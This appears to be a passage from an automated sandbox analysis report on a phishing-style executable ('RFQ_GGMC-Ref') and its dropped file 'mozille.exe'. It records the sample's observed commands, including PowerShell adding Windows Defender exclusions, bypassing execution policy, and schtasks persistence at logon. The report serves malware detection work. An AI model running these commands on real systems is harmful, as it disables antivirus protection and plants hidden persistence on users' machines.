                  Source: mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
                  Source: mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: vmware
                  Source: mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess token adjusted: Debug
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion:

                  Bypasses PowerShell execution policy
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"'
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\dlliok.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pLrWNKFD.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\mozille.exe "C:\Users\user\AppData\Local\Temp\mozille.exe"
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Users\user\AppData\Local\Temp\mozille.exe C:\Users\user\AppData\Local\Temp\mozille.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: mozille.exe, 0000000F.00000002.571887916.0000000001DB0000.00000002.00020000.sdmp | Binary or memory string: Program Manager
                  Source: mozille.exe, 0000000F.00000002.571887916.0000000001DB0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
                  Source: mozille.exe, 0000000F.00000002.571887916.0000000001DB0000.00000002.00020000.sdmp | Binary or memory string: Progman
                  Source: mozille.exe, 0000000F.00000002.571887916.0000000001DB0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
